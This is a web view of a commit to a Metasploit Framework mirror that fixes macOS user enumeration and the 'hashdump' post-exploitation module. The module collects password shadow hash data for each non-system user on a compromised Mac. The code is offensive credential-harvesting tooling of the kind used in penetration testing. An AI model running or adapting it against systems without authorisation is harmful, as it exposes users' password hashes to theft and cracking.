infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #10594, Fix hashdump and user enumeration on new macOS versions

GSoC/Meterpreter_Web_Console
Brent Cook 2018-09-24 22:18:24 -05:00
parent 1607c2b890 3e61a98f25
commit f08cb18afd
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
2 changed files with 22 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
lib/msf/core/post/osx/system.rb
View File

@ -27,14 +27,15 @@ module Msf::Post::OSX::System
def get_users
cmd_output = cmd_exec("/usr/bin/dscacheutil -q user")
users = []
users_arry = cmd_output.split("\n\n")
users_arry = cmd_output.tr("\r", "").split("\n\n")
users_arry.each do |u|
entry = Hash.new
u.each_line do |l|
field,val = l.chomp.split(": ")
next if field == "password"
entry[field] = val.chomp
unless val.nil?
entry[field] = val.strip
end
end
users << entry
end
@ -48,15 +49,17 @@ module Msf::Post::OSX::System
def get_system_accounts
cmd_output = cmd_exec("/usr/bin/dscacheutil -q user")
users = []
users_arry = cmd_output.split("\n\n")
users_arry = cmd_output.tr("\r", "").split("\n\n")
users_arry.each do |u|
entry = {}
u.each_line do |l|
field,val = l.chomp.split(": ")
next if field == "password"
entry[field] = val.chomp
unless val.nil?
entry[field] = val.strip
end
end
next if entry["name"] !~ /^_/
next if entry["name"][0] != '_'
users << entry
end
return users
@ -69,15 +72,17 @@ module Msf::Post::OSX::System
def get_nonsystem_accounts
cmd_output = cmd_exec("/usr/bin/dscacheutil -q user")
users = []
users_arry = cmd_output.split("\n\n")
users_arry = cmd_output.tr("\r", "").split("\n\n")
users_arry.each do |u|
entry = {}
u.each_line do |l|
field,val = l.chomp.split(": ")
next if field == "password"
entry[field] = val.chomp
unless val.nil?
entry[field] = val.strip
end
end
next if entry["name"] =~ /^_/
next if entry["name"][0] == '_'
users << entry
end
return users
@ -96,8 +101,9 @@ module Msf::Post::OSX::System
u.each_line do |l|
field,val = l.chomp.split(": ")
next if field == "password"
entry[field] = val.chomp
unless val.nil?
entry[field] = val.strip
end
end
groups << entry
end

13
modules/post/osx/gather/hashdump.rb
View File

@ -8,10 +8,11 @@ require 'rexml/document'
class MetasploitModule < Msf::Post
# set of accounts to ignore while pilfering data
OSX_IGNORE_ACCOUNTS = ["Shared", ".localized"]
#OSX_IGNORE_ACCOUNTS = ["Shared", ".localized"]
include Msf::Post::File
include Msf::Post::OSX::Priv
include Msf::Post::OSX::System
include Msf::Auxiliary::Report
def initialize(info={})
@ -44,7 +45,8 @@ class MetasploitModule < Msf::Post
end
# iterate over all users
users.each do |user|
get_nonsystem_accounts.each do |user_info|
user = user_info['name']
next if datastore['MATCHUSER'].present? and datastore['MATCHUSER'] !~ user
print_status "Attempting to grab shadow for user #{user}..."
if gt_lion? # 10.8+
@ -201,13 +203,8 @@ class MetasploitModule < Msf::Post
shadow_bytes.sub!(/^dsAttrTypeNative:ShadowHashData:/, '')
end
# @return [Array<String>] list of user names
def users
@users ||= cmd_exec("/bin/ls /Users").each_line.collect.map(&:chomp) - OSX_IGNORE_ACCOUNTS
end
# @return [String] version string (e.g. 10.8.5)
def ver_num
@version ||= cmd_exec("/usr/bin/sw_vers -productVersion").chomp
@product_version ||= get_sysinfo['ProductVersion']
end
end